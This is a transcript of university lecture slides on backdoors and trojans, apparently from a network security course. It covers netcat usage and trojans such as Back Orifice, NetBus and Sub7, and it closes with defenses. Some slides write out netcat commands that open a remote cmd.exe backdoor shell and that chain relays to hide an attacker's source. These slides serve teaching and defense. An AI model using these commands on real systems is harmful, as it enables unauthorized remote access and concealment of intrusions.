Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 Backdoors and Trojans. ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.

Published byAlvin Lamb Modified over 8 years ago

Similar presentations

Presentation on theme: "1 Backdoors and Trojans. ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors."— Presentation transcript:

1 1 Backdoors and Trojans

2 ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors

3 ECE 4112 - Internetwork Security 3 Agenda Netcat Netcat  Overview  Major Features  Installation and Configuration  Possible Uses Netcat Defenses Summary

4 ECE 4112 - Internetwork Security 4 Netcat – TCP/IP Swiss Army Knife Reads and Writes data across the network using TCP/UDP connections Feature-rich network debugging and exploration tool Part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions. UNIX and Windows versions available at: http://www.atstake.com/research/tools/network_utilities/

5 ECE 4112 - Internetwork Security 5 Netcat Designed to be a reliable “back-end” tool – to be used directly or easily driven by other programs/scripts Very powerful in combination with scripting languages (eg. Perl) “If you were on a desert island, Netcat would be your tool of choice!” - Ed Skoudis

6 ECE 4112 - Internetwork Security 6 Netcat – Major Features Outbound or inbound connections TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomizer

7 ECE 4112 - Internetwork Security 7 Netcat – Major Features (contd) Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Hex dump of transmitted and received data Optional ability to let another program service established connections Optional telnet-options responder

8 ECE 4112 - Internetwork Security 8 Netcat (called ‘nc’) Can run in client/server mode Default mode – client Same executable for both modes client mode nc [dest] [port_no_to_connect_to] listen mode (-l option) nc –l –p [port_no_to_connect_to]

9 ECE 4112 - Internetwork Security 9 Netcat – Client mode Computer with netcat in Client mode 1.Input comes from a standard Input device 2.Passes through netcat in client mode 3.Output is sent across the network to any TCP/UDP port on any system

10 ECE 4112 - Internetwork Security 10 Netcat - listen mode Computer with netcat in listen mode 1.Input comes from the network on any TCP/UDP port 2.Passes through netcat in listen mode 3.Output appears on standard output device

11 ECE 4112 - Internetwork Security 11 Netcat - Configuration LINUX installation tar xvfs netcat.tar.gz cd netcat make linux cp nc /usr/local/sbin Note: The last command will allow you to run netcat without having to specify the directory

12 ECE 4112 - Internetwork Security 12 Netcat - Installation Windows Installation  Copy file nc11nt.zip in a folder  Unzip this file – creates a directory called nc11nt  To run netcat – go to the nc11nt folder and run it from there

13 ECE 4112 - Internetwork Security 13 Netcat – Possible uses Transfer files Scan ports Create backdoors Create relays Many more…

14 ECE 4112 - Internetwork Security 14 Netcat – File transfer Scenario: Attacker wants to transfer a file to another machine, only one port open and that is not FTP port Windows – nc listener (IP: a.b.c.d) c:\ nc –l –p 1234 > testfile.txt Linux – nc client (IP: a.b.c.d) nc a.b.c.d 1234 < testfile.txt

15 ECE 4112 - Internetwork Security 15 Netcat – Scan ports Goal: To scan ports without using nmap Send H-E-L-L-O to each target On the client machine echo Hello | nc –v –w 3 –z a.b.c.d 1-200 This will go to various TCP or UDP ports on the target machine

16 ECE 4112 - Internetwork Security 16 Netcat – Create backdoors On Windows machine, create netcat backdoor listener that runs cmd.exe shell c:\ nc –l –p 7777 –e cmd.exe Connect to this backdoor by running netcat in client mode on Linux machine nc a.b.c.d 7777 Can send commands like “cd” and “mkdir”

17 ECE 4112 - Internetwork Security 17 Netcat – Create relays Can be used to bounce connections between systems. Obscures attacker’s source 1.Create a relay on the Linux machine 2.Configure the relay to forward data to another port on the linux machine 3.At the other port, set up a netcat backdoor shell 4.Connect to the relay from the Windows machine using netcat in client mode

18 ECE 4112 - Internetwork Security 18 Netcat Defenses For file transfer and port scanning – Close all unused ports For backdoors  Close unused ports  Carefully audit system usage – Check applications running with root privileges – Close suspicious programs For relays – Multiple layers of security

19 ECE 4112 - Internetwork Security 19 Summary Netcat Netcat Overview Major Features Installation and Configuration Possible Uses Netcat Defenses Next – Trojans/Backdoors

20 ECE 4112 - Internetwork Security 20 Agenda Trojans/Backdoors Malicious Remote Access Tools  Backdoors  Trojans Defenses against Trojans/Backdoors Virtual Network Channels Summary

21 ECE 4112 - Internetwork Security 21 Malicious Remote Access Tools Backdoors  Also called as “trapdoor”  An undocumented way of gaining access to a program, online service or an entire computer system.  Allows to execute privileged operations on the affected machine Trojan Horse  Does not replicate or copy itself  Damages or compromises the security of the computer  It relies on someone emailing it to you. It does not email itself

22 ECE 4112 - Internetwork Security 22 Back Orifice Authored by Cult of the Dead Cow Released on 3 rd Aug 1998 Allows remote manipulation of  File system  Registry  System  Passwords  Network  Processes

23 ECE 4112 - Internetwork Security 23 Back Orifice (cont.) First widely used trojan  Complete Implementation of services supported by the Windows 95/98 API  Small, freely available  Attached to innocent binary Detection  Encrypted UDP (port 31337)  XOR packets with random stream + password  Optional TCP file transfer

24 ECE 4112 - Internetwork Security 24 NetBus Officially distributed by SpectorSoft (www.netbus.org)www.netbus.org eBlaster  Records information and emails it  All websites visited, applications run, keystrokes typed, chat conversations, instant messages Spector  Like a “camera”  Records everything being done on the computer, takes several screen shots which can be played back as a movie

25 ECE 4112 - Internetwork Security 25 NetBus The author of NetBus says, "NetBus was made to let people have some fun with his/her friends." He also says, "I hope NetBus (and similar programs like Back Orifice) will make more people aware of the security risks at their system." Unfortunately, NetBus allows far more access than a mere prank should ever require

26 ECE 4112 - Internetwork Security 26 NetBus It allows anyone running the client portion to connect and control anyone running the server portion of it, with the same rights and privileges as the currently logged on user.

27 ECE 4112 - Internetwork Security 27 NetBus Features  Does everything Back Orifice can do & more  Tricks with the CD (open, close on command or timed intervals  Mouse control (can swap functions of the left and right buttons)  Send Interactive dialogues to communicate with the compromised machine

28 ECE 4112 - Internetwork Security 28 Sub7 One of the most popular and powerful trojan horses around Originally known as Backdoor G Has been revised many times in the past Known for its ease of use and flexible settings

29 ECE 4112 - Internetwork Security 29 Sub7 A partial list of what Sub7 can do  Monitor all online activity  Manipulate any file on the machine  Edit the registry  Host FTP servers  Record passwords and keystrokes  Watch you (if you have a webcam) and much more…

30 ECE 4112 - Internetwork Security 30 Sub7 Used to escape virus detection, since it morphs itself, every time it is sent to a new victim How it loads, where it hides  It can hide in any directory and can load from the registry and a few other less known places  It can be assigned a different file name each time it runs, so every time the machine is rebooted, the file is altered in some way  Harder to track down and delete

31 ECE 4112 - Internetwork Security 31 Sub7 It usually hides in the following location HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrenVersion\Run or HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunServices or HKEY_CLASSES_ROOT\*\shellex

32 ECE 4112 - Internetwork Security 32 Sub7 If it is placed in the shellex part of the registry, even if the infected file is removed, the computer will not function properly For e.g. c:\windows\sub7.exe /notepad.exe Removing sub7.exe will stop normal execution of notepad.exe also

33 ECE 4112 - Internetwork Security 33 Sub7 Main Window. Shown here are the different server settings. Sub7 Screenshot #1

34 ECE 4112 - Internetwork Security 34 Sub7 Screen Capture. Sub7 Screenshot #2

35 ECE 4112 - Internetwork Security 35 Sub7 File Manager. Sub7 Screenshot #3

36 ECE 4112 - Internetwork Security 36 Controlling the cloaking and other options of the Sub7 Server Sub7 Screenshot #4

37 ECE 4112 - Internetwork Security 37 How attackers find an infected PC Some trojans report the IP address on an IRC channel Port scanners  Used to find PCs which has “the backdoor open” Customized access – Password protected  Infected machine can then be accessed only by the person who has the password

38 ECE 4112 - Internetwork Security 38 Defense against Trojans/Backdoors Scan attachments properly (most common way of infecting machines) Anti-virus checks Firewalls Remove suspicious programs/processes

39 ECE 4112 - Internetwork Security 39 Virtual Network Connections Application level backdoor Can control for example a Windows machine from a Linux machine using VNC  Install VNC  Run the VNC server on the Windows machine  Use Linux VNC viewer to access the server on Windows machine

40 ECE 4112 - Internetwork Security 40 Virtual Network Connections Controlling a Linux machine from Windows  Run VNC server on Linux  Use VNC viewer from Windows to access the Linux machine Note: Reconfigure the firewall on a linux machine to accept packets for the VNC port (TCP port 5901)

41 ECE 4112 - Internetwork Security 41 Summary Trojans Backdoors Defenses against Trojans/Backdoors Virtual Network Connections

Download ppt "1 Backdoors and Trojans. ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors."

Similar presentations

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.
Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.

Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.

Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
Trojan Horse Program Presented by : Lori Agrawal.

Trojan Horse Program Presented by : Lori Agrawal.
What are Trojan horses?  A Trojan horse is full of as much trickery as the mythological Trojan horse it was named after. The Trojan horse, at first glance.

What are Trojan horses?  A Trojan horse is full of as much trickery as the mythological Trojan horse it was named after. The Trojan horse, at first glance.
Security strategy. What is security strategy? How an organisation plans to protect and respond to security attacks on their information technology assets.

Security strategy. What is security strategy? How an organisation plans to protect and respond to security attacks on their information technology assets.
CS 450 - Nathan Digangi.  Secret, undocumented routine embedded within a useful program  Execution of the program results in execution of secret code.

CS Nathan Digangi.  Secret, undocumented routine embedded within a useful program  Execution of the program results in execution of secret code.
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Sponsored by.

Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Telnet/SSH Tim Jansen, Mike Stanislawski. TELNET is short for Terminal Network Enables the establishment of a connection to a remote system, so that the.

Telnet/SSH Tim Jansen, Mike Stanislawski. TELNET is short for Terminal Network Enables the establishment of a connection to a remote system, so that the.
Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.

Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.
Protecting Yourself Online. VIRUSES, TROJANS, & WORMS Computer viruses are the common cold of modern technology. One e-mail in every 200 containing.

Protecting Yourself Online. VIRUSES, TROJANS, & WORMS Computer viruses are the "common cold" of modern technology. One in every 200 containing.
Privacy - not readable Permanent - not alterable (can't edit, delete) Reliable - (changes detectable) But the data must be accessible to persons authorized.

Privacy - not readable Permanent - not alterable (can't edit, delete) Reliable - (changes detectable) But the data must be accessible to persons authorized.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Apache : Installation, Configuration, Basic Security Presented by, Sandeep K Thopucherela, ECE Department.

Apache : Installation, Configuration, Basic Security Presented by, Sandeep K Thopucherela, ECE Department.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
The Five Most Popular Attacks on the Internet Peter Mell, 1-7-98 National Institute of Standards and Technology Computer Security Division.

The Five Most Popular Attacks on the Internet Peter Mell, National Institute of Standards and Technology Computer Security Division.
© 2010 VMware Inc. All rights reserved VMware ESX and ESXi Module 3.

© 2010 VMware Inc. All rights reserved VMware ESX and ESXi Module 3.

Similar presentations

Ads by Google